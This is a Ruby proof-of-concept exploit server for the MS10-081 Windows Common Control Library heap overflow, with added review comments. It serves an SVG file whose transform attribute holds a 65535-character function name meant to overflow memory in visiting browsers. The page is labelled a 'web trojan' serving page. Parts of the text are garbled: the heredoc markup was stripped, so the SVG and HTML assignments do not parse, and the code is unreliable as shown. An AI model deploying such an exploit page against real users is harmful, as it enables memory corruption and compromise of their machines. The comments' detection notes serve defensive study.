MS10-081: Windows Common Control Library (Comctl32) Heap Overflow, MS10-081 网马 (proof-of-concept serving page):
#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
require 'socket'
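def http_send(sock, data, opts={})
  # Write one minimal HTTP/1.1 response (status line, Date, Content-Length,
  # Content-Type, blank line, then the body) to +sock+.
  #
  # @param sock [IO] open socket (or any IO) to write the response to
  # @param data [String] response body
  # @param opts [Hash] :code ("200"), :message ("OK"), :type ("text/html"),
  #   :desc ("content", only used in the progress line printed to stdout)
  # @return [Boolean] true when the write succeeded, false when the socket
  #   raised an IO or system-call error (peer gone, socket closed)
  defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
  opts = defaults.merge(opts)
  date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
  # Header lines are CRLF-terminated; the extracted original carried a bare
  # "rn" (escape backslashes stripped), which no HTTP client parses as a line
  # end.  Content-Length is a byte count, so use bytesize rather than length.
  headers = "HTTP/1.1 #{opts[:code]} #{opts[:message]}\r\n" \
            "Date: #{date_str}\r\n" \
            "Content-Length: #{data.bytesize}\r\n" \
            "Content-Type: #{opts[:type]}\r\n\r\n"
  puts "[+] Sending #{opts[:desc]}"
  begin
    sock.write(headers + data)
  rescue IOError, SystemCallError
    # Explicit rescue instead of the `rescue return false` modifier, which
    # silently swallowed every StandardError, not just socket failures.
    return false
  end
  true
end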
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
puts " " + out_str.split("n")[0]
return true
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
# --- Demo harness: a single-threaded HTTP server that hands out the PoC page. ---
# Listening port: first CLI argument (left as a String) or 55555.
port = ARGV[0] || 55555
# NOTE(review): "x21" is presumably an extraction-stripped "\x21" escape; either
# way the transform function name below is 65535 characters long, far beyond any
# legitimate SVG transform keyword.  An SVG/XML transform attribute of that size
# is the distinguishing feature of this PoC and can serve as a detection cue.
transform_name = "x21" * 65535
# NOTE(review): the heredoc openers (presumably "<<SVG" / "<<HTML") and all
# angle-bracketed markup were stripped by extraction, so the two assignments
# below do not parse as written; only the terminators SVG and HTML survived.
svg =
br>
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
style="fill: #ffffff"
transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
>
CLICK ME
SVG
# HTML wrapper page; its body is missing from the extracted text.
html =
HTML
puts "[+] Listening on port #{port}"
puts
TCPServer.open(port) do |srv|
# Accept loop: one client at a time, no threads.
while true
cli = srv.accept
req = ""
# sock_read closes the client on timeout and returns false; skip to the next accept.
next unless sock_read(cli, req, 5)
# Keep answering on the same connection while the client keeps sending.
while req.length > 0
if req =~ /GET.*svg/i
# Any GET whose request line mentions "svg" gets the SVG document.
break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
elsif req =~ /QUIT/
# Remote shutdown: any peer that sends "QUIT" terminates the whole server.
exit()
else
break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
end
req = ""
next unless sock_read(cli, req, 5)
end
# Close may raise if sock_read already closed the socket; ignore and continue.
cli.close rescue next
end
end